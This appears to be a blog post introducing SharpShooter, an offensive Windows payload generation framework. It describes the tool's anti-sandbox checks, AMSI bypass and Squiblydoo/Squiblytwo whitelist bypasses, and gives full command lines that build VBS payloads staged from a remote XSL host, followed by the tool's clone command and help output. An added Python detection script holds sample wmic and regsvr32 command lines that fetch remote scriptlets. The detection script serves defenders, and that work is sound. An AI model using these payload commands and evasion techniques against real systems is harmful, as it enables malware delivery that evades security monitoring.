The increased use of PowerShell in attacks means that PowerShell is now much better logged and detected. Yes, PowerShell is flexible, but alternatives were urgently needed, and attention turned to C# and the .NET utilities for executing code on Windows. That is how SharpShooter, a payload generation framework, came about.
SharpShooter is a weaponised payload generation framework with anti-sandbox analysis, staged and stageless payload execution and support for evading ingress monitoring.
Payload Generation Framework: SharpShooter
- Supported payload formats: HTA, JS, VBS, JSE, VBA, VBE and WSF.
- Sandbox Detection: several default techniques to evade detection, including identifying analysis tools.
- Stageless Execution: with the ability to inject in-memory shellcode directly into the process, the framework supports a fully fileless mode.
- XSL Exploitation (Squiblytwo): bypasses signatures and security solutions by executing XSL (eXtensible Stylesheet Language) full-trust scripts from the WMIC command line.
- Squiblydoo and Squiblytwo support: COM Staging and XSL Exploitation directly through COM.
- AMSI Bypass: uses an XPath expression in the XSL file to bypass the Windows Defender AMSI signature.
Since SharpShooter has several default techniques to evade detection, including identifying analysis tools, you can choose some or all of them. The payload will not execute if the conditions of the selected sandbox detection techniques are met:
- Key to Domain: the payload will only execute on a specific domain;
- Ensure Domain Joined: the payload will only execute if the workstation is domain joined;
- Check for Sandbox Artifacts: searches the file system for artifacts of known sandbox technologies and virtualisation systems; if any are found, the payload will not execute;
- Check for Bad MACs: checks the MAC address of the system; if the vendor matches known virtualisation software, the payload will not execute;
- Check for Debugging: if the payload is being debugged, it will not execute.
SharpShooter supports both staged and stageless payload execution. With the ability to inject in-memory shellcode directly into the process, the framework supports a fully fileless mode.
Squiblydoo and Squiblytwo
SharpShooter supports the Squiblydoo and Squiblytwo attacks.
- One-liners using a COM interface (COM Staging):
SharpShooter would now create either an XSL- or SCT-hosted payload, and the script-based payload would be a COM stager in HTA, VBS, JS, WSF or a similar format, to execute either
The following command will generate this with SharpShooter:
python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awl wmic --awlurl http://192.168.2.8:8080/foo.xsl
- XSL Exploitation directly through COM
The benefit of this technique is that you are able to avoid some of the indicators associated with the wmic.exe and regsvr32.exe techniques; in particular, there is no risk of being detected through command-line logging.
This technique can be used by running:
python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x64payload.bin --smuggle --template mcafee --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl
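As an added defensive example, not part of SharpShooter or of the original post: the wmic.exe and regsvr32.exe variants mentioned above leave the remote XSL/SCT location in the process command line, so a process-creation feed (Sysmon Event ID 1 or Windows 4688) can flag them. The records below are constructed, and the record layout, rule names and IP address are assumptions; the xslremote COM variant leaves no such command line, so this check does not cover it.

```python
import re

# Constructed Sysmon-style process-creation records, not real telemetry.
# Assumed layout: one record per line, "Image=<path>|CommandLine=<cmdline>".
SAMPLE_EVENTS = r"""
Image=C:\Windows\System32\wbem\WMIC.exe|CommandLine=wmic os get /format:"http://192.168.2.8:8080/foo.xsl"
Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s /n /u /i:http://192.168.2.8:8080/foo.sct scrobj.dll
Image=C:\Windows\System32\wbem\WMIC.exe|CommandLine=wmic computersystem get domain
Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s "C:\Program Files\Vendor\lib.dll"
Image=C:\Windows\System32\wbem\WMIC.exe|CommandLine=wmic process list /format:csv
""".strip()

# Rules keyed by executing image (hypothetical names); first matching rule wins.
# wmic's built-in /format: values are bare names (csv, list, ...), so a URL or an
# explicit .xsl file after /format: is the Squiblytwo indicator. regsvr32 with a
# URL after /i: or with scrobj.dll as its target is the Squiblydoo indicator.
RULES = {
    "wmic.exe": [
        ("wmic_remote_xsl", re.compile(r'/format:\s*"?https?://', re.I)),
        ("wmic_local_xsl_file", re.compile(r'/format:\s*"?[^\s"]+\.xsl\b', re.I)),
    ],
    "regsvr32.exe": [
        ("regsvr32_remote_scriptlet", re.compile(r'/i:\s*"?https?://', re.I)),
        ("regsvr32_scrobj", re.compile(r"\bscrobj\.dll\b", re.I)),
    ],
}


def parse_event(line):
    """Split one record into (lower-cased image basename, command line)."""
    fields = dict(part.split("=", 1) for part in line.split("|", 1))
    image = fields["Image"].rsplit("\\", 1)[-1].lower()
    return image, fields["CommandLine"]


def detect(events):
    """Return [(image, rule name, command line)] for every record hitting a rule."""
    hits = []
    for line in events.splitlines():
        if not line.strip():
            continue
        image, cmdline = parse_event(line)
        for name, pattern in RULES.get(image, []):
            if pattern.search(cmdline):
                hits.append((image, name, cmdline))
                break
    return hits


if __name__ == "__main__":
    for image, rule, cmdline in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {image}: {cmdline}")
```

The benign records (a plain `wmic ... get domain`, a local DLL registration, the built-in `csv` format) produce no hits, which is the false-positive check a rule like this needs before it goes into a SIEM.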
Clone it from GitHub:
git clone https://github.com/mdsecactivebreach/SharpShooter.git
To see the available options, methods and techniques, just run the script with the -h option:
usage: SharpShooter.py [-h] [--stageless] [--dotnetver <ver>] [--com <com>]
                       [--awl <awl>] [--awlurl <awlurl>] [--payload <format>]
                       [--sandbox <types>] [--amsi <amsi>] [--delivery <type>]
                       [--rawscfile <path>] [--shellcode] [--scfile <path>]
                       [--refs <refs>] [--namespace <ns>] [--entrypoint <ep>]
                       [--web <web>] [--dns <dns>] [--output <output>]
                       [--smuggle] [--template <tpl>]

optional arguments:
  -h, --help            show this help message and exit
  --stageless           Create a stageless payload
  --dotnetver <ver>     Target .NET Version: 2 or 4
  --com <com>           COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote
  --awl <awl>           Application Whitelist Bypass Technique: wmic, regsvr32
  --awlurl <awlurl>     URL to retrieve XSL/SCT payload
  --payload <format>    Payload type: hta, js, jse, vba, vbe, vbs, wsf
  --sandbox <types>     Anti-sandbox techniques:
                        Key to Domain (e.g. 1=CONTOSO)
                        Ensure Domain Joined
                        Check for Sandbox Artifacts
                        Check for Bad MACs
                        Check for Debugging
  --amsi <amsi>         Use amsi bypass technique: amsienable
  --delivery <type>     Delivery method: web, dns, both
  --rawscfile <path>    Path to raw shellcode file for stageless payloads
  --shellcode           Use built in shellcode execution
  --scfile <path>       Path to shellcode file as CSharp byte array
  --refs <refs>         References required to compile custom CSharp, e.g. mscorlib.dll,System.Windows.Forms.dll
  --namespace <ns>      Namespace for custom CSharp, e.g. Foo.bar
  --entrypoint <ep>     Method to execute, e.g. Main
  --web <web>           URI for web delivery
  --dns <dns>           Domain for DNS delivery
  --output <output>     Name of output file (e.g. maldoc)
  --smuggle             Smuggle file inside HTML
  --template <tpl>      Name of template file (e.g. mcafee)